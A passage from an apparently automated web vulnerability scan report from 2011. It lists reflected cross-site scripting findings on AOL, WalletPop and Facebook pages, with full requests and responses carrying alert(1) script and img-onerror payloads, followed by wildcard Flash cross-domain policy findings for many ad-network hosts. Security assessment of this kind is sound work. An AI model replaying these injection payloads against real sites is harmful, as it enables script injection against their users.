User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803e3ed5<script>alert(1)</script>67ac9eab662; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-14_886262241304557034; expires=Tue, 03-May-2016 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_886262241304557034; expires=Thu, 05-May-2011 01:12:14 GMT; path=/; domain=c3metrics.com
Content-Length: 6696
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='aol';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803e3ed5<script>alert(1)</script>67ac9eab662';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='886262241304557034';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcall
...[SNIP]...

5.248. http://walletpop.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://walletpop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8a5f"><script>alert(1)</script>35907aad5ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?d8a5f"><script>alert(1)</script>35907aad5ac=1 HTTP/1.1
Host: walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:56:17 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:26:17 GMT
Content-length: 137
Content-type: text/html
Location: http://www.walletpop.com/?d8a5f"><script>alert(1)</script>35907aad5ac=1
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.walletpop.com/?d8a5f"><script>alert(1)</script>35907aad5ac=1">here.</a>
</body>
</html>

5.249. http://www.aol.com/ [dlact cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1124"-alert(1)-"6a0d04d96d1 was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2a1124"-alert(1)-"6a0d04d96d1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=47F3597F5AADCEB36B262F261CE5067A; Path=/aol
Content-Length: 63405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl2a1124"-alert(1)-"6a0d04d96d1";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 13;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

5.250. http://www.aol.com/ [rrpmo1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d687"-alert(1)-"65e99ea59a8 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~05d687"-alert(1)-"65e99ea59a8; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=5BD36E2786B24B66765E62769A9E47BB; Path=/aol
Content-Length: 63383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1304556981389~05d687"-alert(1)-"65e99ea59a8");</script>
...[SNIP]...

5.251. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b was submitted in the REST URL parameter 3. This input was echoed as e76bc<img src=a onerror=alert(1)>b0233c9330b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Alexander-Bucky-Jordan/1242845259e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.41
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 55

/1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b

5.252. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 was submitted in the REST URL parameter 3. This input was echoed as 1c030<img src=a onerror=alert(1)>5ccc611056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan%20/1000008248207831c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 302 Found
Location: /1000008248207831c030<img src=a onerror=alert(1)>5ccc611056
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.33
X-Cnection: close
Date: Thu, 05 May 2011 11:44:01 GMT
Content-Length: 59

/1000008248207831c030<img src=a onerror=alert(1)>5ccc611056

5.253. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd was submitted in the REST URL parameter 3. This input was echoed as 41583<img src=a onerror=alert(1)>ab0e5e0e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/10000082482078341583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: /10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.236.106
X-Cnection: close
Date: Thu, 05 May 2011 02:52:12 GMT
Content-Length: 60

/10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd

5.254. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 was submitted in the REST URL parameter 4. This input was echoed as a46e0<img src=a onerror=alert(1)>3df2a38ae45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/100000824820783/x22a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22a46e0<img src=a onerror=alert(1)>3df2a38ae45
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.43
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 48

/x22a46e0<img src=a onerror=alert(1)>3df2a38ae45

6. Flash cross-domain policy
There are 140 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://a0.twimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a0.twimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a0.twimg.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:49:48 GMT
Last-Modified: Tue, 21 Dec 2010 23:55:41 GMT
Content-Type: application/xml
ETag: "46c43cac3f2c81be289b141b7c02df9c"
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 1a9421094931759c4f7e205ba1f437a58595340a38dfa855000179b2ce1d400ec26c592607367060
x-amz-id-2: alHNUXtFkE6bCmS6U8LI/q84/qrFaMSkhNAlnOeW0EOpWg6EWcymiOtqaEPGh2pO
x-amz-request-id: 69C90925A0E2ADB7
X-Cache: Hit from cloudfront
Content-Length: 206
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.2. http://about-search.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://about-search.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: about-search.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:09 GMT
Server: Apache/2.0
Last-Modified: Wed, 13 Dec 2006 20:31:12 GMT
ETag: "9d-4792e400"
Accept-Ranges: bytes
Content-Length: 157
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
   <allow-access-from domain="*.ru4.com" secure="false" />
</cross-domain-policy>

6.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 05 May 2011 00:56:58 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:13c9"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Thu, 05 May 2011 00:56:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.5. http://ads.undertone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "426811d-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Thu, 05 May 2011 00:59:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://adx.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.7. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 05 May 2011 00:56:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.8. http://apartments.rentedspaces.oodle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apartments.rentedspaces.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT
ETag: "45835b-ca-44832e564dd40"
Content-Type: application/xml
Date: Thu, 05 May 2011 10:52:33 GMT
Content-Length: 202
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.9. http://api.bit.ly/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 10:52:31 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Mon, 09 Aug 2010 21:22:00 GMT
Connection: close
Expires: Sat, 07 May 2011 10:52:31 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.10. http://api.oscar.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.oscar.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
Server: Apache
Last-Modified: Thu, 12 Oct 2006 16:41:52 GMT
ETag: "ca801a-68-41f9fd940b400"
Accept-Ranges: bytes
Content-Length: 104
Keep-Alive: timeout=1, max=48
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.11. http://api.screenname.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

